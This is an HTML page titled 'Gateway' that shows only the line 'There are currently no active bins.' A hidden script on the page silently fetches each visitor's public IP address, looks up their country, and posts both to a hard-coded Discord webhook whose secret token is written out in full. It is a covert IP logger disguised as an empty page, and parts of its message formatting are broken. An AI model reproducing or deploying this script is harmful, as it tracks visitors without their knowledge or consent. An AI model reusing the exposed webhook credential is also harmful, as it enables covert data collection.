<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Gateway</title>
</head>
<body>

<h3>There are currently no active bins.</h3>

<script>
    function getFlagEmoji(countryCode) {
        const codePoints = countryCode.toUpperCase().split('').map(char => 127397 + char.charCodeAt(0));
        return String.fromCodePoint(...codePoints);
    }

    fetch('https://api64.ipify.org?format=json')
        .then(response => response.json())
        .then(data => {
            const ipAddress = data.ip;

            fetch(`https://ipapi.co/${ipAddress}/json/`)
                .then(response => response.json())
                .then(countryData => {
                    const country = countryData.country_name || 'Unknown';
                    const countryCode = countryData.country || 'N/A';

                    const webhookUrl = 'https://discord.com/api/webhooks/1221826422616625182/FgixyJO2e1A4xGZIQasrA-xJHDzi0HwVvxehOySWzi9HlyWvyONdPlmHODWzqwCp_rEa';
                    const message = "`Visitor IP: ${ipAddress}`\nCountry: ${country} ${getFlagEmoji(countryCode)}";

                    fetch(webhookUrl, {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json',
                        },
                        body: JSON.stringify({ content: message }),
                    });
                })
                .catch(() => {
                    const webhookUrl = 'https://discord.com/api/webhooks/1221826422616625182/FgixyJO2e1A4xGZIQasrA-xJHDzi0HwVvxehOySWzi9HlyWvyONdPlmHODWzqwCp_rEa';
                    const errorMessage = 'Couldn\'t fetch country information';
                    
                    fetch(webhookUrl, {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json',
                        },
                        body: JSON.stringify({ content: errorMessage }),
                    });
                });
        })
        .catch(error => console.error('Error:', error));
</script>

</body>
</html>
